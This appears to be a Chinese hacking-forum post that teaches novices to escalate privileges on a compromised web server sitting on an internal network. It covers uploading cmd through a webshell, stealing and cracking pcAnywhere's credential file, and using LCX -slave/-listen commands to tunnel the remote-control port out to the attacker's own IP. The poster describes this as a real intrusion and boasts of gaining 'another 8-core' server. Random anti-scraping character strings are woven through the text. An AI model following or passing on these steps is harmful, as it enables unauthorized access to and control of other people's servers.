- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
8 y6 A, r- U2 Q( f# J1 d6 G: x* w+ S
提权方法:pcanywhere+LCX9 @8 y* P2 I! c, e
# Q" U1 @: u5 L" k, Y) n6 e `/ B获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。0 X7 U3 P( r. z; J$ \
# G: i3 S+ N" W9 `, t! R/ i
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
4 D5 V8 Y% r x& e+ L+ P8 Q# _3 _& ?% g& v) K9 z! d4 V# `
( c) t& \& i; J查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。) X5 Z! G7 ^ m6 z1 j; i* @
9 e' a& p! O+ M& ?" Y+ M8 \* x9 K
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
' ?. ~7 i* J1 i3 _) W; a( r9 M( D* o' ~, u4 Q; n
1 z z! S* |7 @* D& H8 P/ m2 W4 q$ e! g5 c1 j
, a# N/ e+ y4 X* X; l/ Q: L
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
- W0 [! ^+ A7 }6 d8 g: z. o
5 d, F& ^- i: n2 I9 E& S5 W: U/ ?: ^% E
LCX的用法再简单说下:$ t/ b R- P* _) |$ o9 ~$ r X! t
; m+ R5 P. I" \3 X5 C+ V
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
: S3 f- l: i9 T+ W; K, j6 Y6 R: \# o) I
3 _- \6 D4 G7 v1 I) x! S& B本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)7 I) a/ ]6 V+ s! E
, C v, x- G& N* u6 ]& H
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。- o6 p* K* g% a7 |3 e- y& T
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``/ K! F- E g( j
) s2 _( [$ [& e! [: h4 m5 C- h# H
+ h0 N; M% i* P* Z0 K( C, Q* N( D; t/ A
. Q9 F% e" s( j4 P4 O* C* h3 @# `3 \$ g
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。$ J/ B) B; i5 K$ m# P; s( R
% f8 p2 }/ x" `5 _
% G# H0 j0 \* |, S1 ?. k+ `5 ?% r, P" ~. j) B$ R7 _
% v9 Q3 I' Q2 A7 S# I5 {$ L" Q我们本地连接试试,输入我们刚破解的账号密码
$ o5 M) Z% X5 ^; _6 ], x l
5 ^# F! l4 d; l! _4 E1 I
5 R- ^* v2 I+ R( o& W" {- W呵呵``连接成功,服务器不错,又一个8核^︵^
1 w9 W2 ~: Y+ g- G H. d
- H3 u9 `& ?, K7 }7 }* f, N0 f& n- u/ }2 A
2 I1 j2 K, P9 _/ B4 F5 H |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|